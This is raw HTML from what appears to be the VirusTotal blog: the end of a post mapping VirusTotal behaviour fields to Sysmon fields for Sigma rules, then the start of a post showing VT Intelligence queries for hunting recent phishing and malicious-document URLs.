style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">EventType</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">TargetObject</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">Details</span>
</p>
</td>
</tr>
<tr style="height: 82.5pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior_services</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.services_bound</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.services_created</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.services_opened</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.services_started</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.services_stopped</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.services_deleted</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">registry_set</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">process_creation</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">Image</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">CommandLine</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">ParentCommandLine</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">ParentImage</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">EventType</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">TargetObject</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">Details</span>
</p>
</td>
</tr>
<tr style="height: 352.5pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior_network</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.dns_lookups</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.dns_lookups[x].hostname</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.dns_lookups[x].resolved_ips
</span></p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.hosts_file</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.ip_traffic</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.ip_traffic[x].destination_ip</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.ip_traffic[x].destination_port</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.ip_traffic[x].transport_layer_protocol</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.http_conversations</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.http_conversations[x].url</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.http_conversations[x].request_method</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.http_conversations[x].request_headers</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.http_conversations[x].response_headers</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.http_conversations[x].response_status_code</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.http_conversations[x].response_body_filetype</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].hostname</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].destination_ip</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].destination_port</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].smtp_from</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].smtp_to</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].message_from</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].message_to</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].message_cc</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].message_bcc</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].timestamp</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].subject</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].html_body</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].txt_body</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.smtp_conversations[x].x_mailer</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.tls</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">network_connection</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">DestinationHostname</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">DestinationIp</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">DestinationIsIpv6</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">DestinationPort</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">DestinationPortName</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourceIp</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourceIsIpv6</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourcePort</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">SourcePortName</span>
</p>
</td>
</tr>
<tr style="height: 37.5pt;">
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">behavior (too generic)</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">vt.behaviour.modules_loaded</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">image_load</span>
</p>
</td>
<td
style="border-bottom: solid #cccccc 0.75pt; border-left: solid #cccccc 0.75pt; border-right: solid #cccccc 0.75pt; border-top: solid #cccccc 0.75pt; overflow-wrap: break-word; overflow: hidden; padding: 2pt 2pt 2pt 2pt; vertical-align: bottom;">
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">ImageLoaded</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">Image</span>
</p>
<p dir="ltr" style="line-height: 1.38; margin-bottom: 0pt; margin-top: 0pt;"><span
style="font-family: Arial, sans-serif; font-size: 10pt; font-variant-alternates: normal; font-variant-east-asian: normal; font-variant-numeric: normal; font-variant-position: normal; vertical-align: baseline; white-space-collapse: preserve;">OriginalFileName</span>
</p>
</td>
</tr>
</tbody>
</table>
</div>
<h2 style="text-align: left;">Wrapping up
</h2>
<div class="interval_12"> At VirusTotal, we believe that the Sigma language is a valuable tool for the community to share information about samples’ behavior. Our objective is to make its use on VT as simple as possible. Our addition of MacOS and Linux is just the start of what we are working on, as we aim to add Sysmon for Linux to obtain more robust results, including the ability to download full generated logs.
</div>
<div class="interval_12"> Remember that <a href="https://www.virustotal.com/ui/sigma_rules" target="_blank">here</a> you have a list of all the Crowdsourced Sigma rules that are currently deployed in VirusTotal and that you can use for threat hunting.
</div>
<div class="interval_12"> We hope you join our fan club of Sigma and VirusTotal, and as always <a href="https://www.virustotal.com/gui/contact-us" target="_blank">we are happy to hear your feedback.</a>
</div>
<div class="interval_12"> Happy Hunting!
</div>
<style>
.my-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: Black;
color: White;
/*padding: 24px;*/
border-collapse: collapse;
}
.my-yara-code{
font-family: "Courier", sans-serif;
font-size: medium;
width: 100%;
background: #F7F9F9;
color: Black;
/*padding: 24px;*/
border-collapse: collapse;
}
mark.green {
color:#3cb371;
background: none;
}
mark.gray {
color:Gray;
background: none;
}
mark.yellow {
color:Yellow;
background: none;
}
mark.orange {
color:Orange;
background: none;
}
mark.red {
color:Red;
background: none;
}
mark.blue {
color:#33BEFF;
background: none;
}
mark.dark-blue {
color:Blue;
background: none;
}
.table-container {
/*padding: 32px;*/
font-family: "Courier", sans-serif;
font-size: medium;
}
.table-container table {
width: 100%;
background: #fff;
color: #222;
/*padding: 24px;*/
border-collapse: collapse;
}
.table-container table th {
font-weight: bold!important;
text-transform: none!important;
}
.table-fields {
background: #86aaf9;
}
th:first-child { width: 24%; }
th:first-child+th { width: 39%; }
/*
.table-container table td,
.table-container table th {
padding: 16px 32px;
}
*/
.table-container table tr {
border-bottom: 1px solid #eee;
}
@media (max-width: 580px) {
.table-container table thead {
display: none;
}
.table-container table td {
display: block;
}
}
a {
color: blue!important;
}
.central_img {
position: relative;
display: block;
margin-left: auto;
margin-right: auto;
}
.central_img img {
border: 1px solid #000000;
}
.central_img p {
text-align: center;
font-style: italic;
}
.width_10 {
width: 10%;
}
.width_15 {
width: 15%;
}
.width_20 {
width: 20%;
}
.width_30 {
width: 30%;
}
.width_40 {
width: 40%;
}
.width_50 {
width: 50%;
}
.width_60 {
width: 60%;
}
.width_80 {
width: 80%;
}
.width_90 {
width: 90%;
}
.width_100 {
width: 100%;
}
ul{
margin-bottom: 5px!important;
}
.interval_12{
margin-bottom: 12px!important;
}
</style>Joseliyo Sánchezhttp://www.blogger.com/profile/15205592295367780978noreply@blogger.comtag:blogger.com,1999:blog-6871606241422173914.post-69757649987163571282023-12-18T12:36:00.000+01:002023-12-18T12:36:04.878+01:00Protecting the perimeter with VT Intelligence - malicious URLs
<div class="interval_12">Please note that this blogpost is part of our #VTMondays series, check out our collection of past publications <a href="https://blog.virustotal.com/2023/12/vtmondays-index.html" target="_blank">here</a>.</div>
<div class="interval_12">One of the main attacking vectors attackers use for credential theft and malware deployment are malicious link-based attacks leveraging impersonated websites or distributing malware. By studying malicious campaigns, defenders can learn attacker tactics and refine their defensive arsenal. They can also use suspicious URLs preemptively, updating deny lists and searching for any suspicious internal or perimetral activity.</div>
<div class="interval_12"><a href="https://www.virustotal.com/gui/home/search" target="_blank">VT Intelligence</a> provides a powerful toolset for this mission and can be used to improve URL filtering in your firewalls. Now, we will dive into a series of VT queries progressively increasing their complexity, and dissect the added modifiers for each step. Feel free to experiment and refine these examples to build your own customized queries.</div>
<br>
<div class="interval_12">To begin, we will start by searching for URLs <b>(“entity:url”)</b> categorized as phishing according to the content category of its domain <b>(“category:phishing”)</b> or labeled as phishing by AntiVirus engines <b>(“engines:phishing”)</b>. We will use the <b>“p”</b> modifier (“p” is short for “positives”, referring to the number of engines detections) to discard benign URLs. In this case, we want URLs with more than 15 detections to avoid false positives, however this is completely at your discretion. Finally, we will look for URLs first seen (<b>“fs”</b> as short for first submission) in the last 7 days <b>(7d+)</b>.
</div>
<div class="my-yara-code interval_12"><a href="https://www.virustotal.com/gui/search/entity%253Aurl%2520(category%253Aphishing%2520or%2520engines%253Aphishing)%2520p%253A15%252B%2520fs%253A7d%252B/urls" target="_blank">entity:url (category:phishing or engines:phishing) p:15+ fs:7d+</a></div>
<br />
<div class="interval_12">
The following query hunts new malicious URLs submitted to VirusTotal in the last 7 days distributing Microsoft document or PDF files <b>(“tag:downloads-doc or tag:downloads-pdf”)</b>. We use the <b>“p”</b> modifier to search for URLs with a high number of detections <b>(“p:15+”)</b>. Malicious URLs used for phishing are likely to distribute this kind of files to compromise the victim's system.
</div>
<div class="my-yara-code interval_12"><a href="https://www.virustotal.com/gui/search/entity%253Aurl%2520(tag%253Adownloads-doc%2520or%2520tag%253Adownloads-pdf)%2520p%253A15%252B%2520fs%253A7d%252B/urls" target="_blank">entity:url (tag:downloads-doc or tag:downloads-pdf) p:15+ fs:7d+</a></div>
<br />
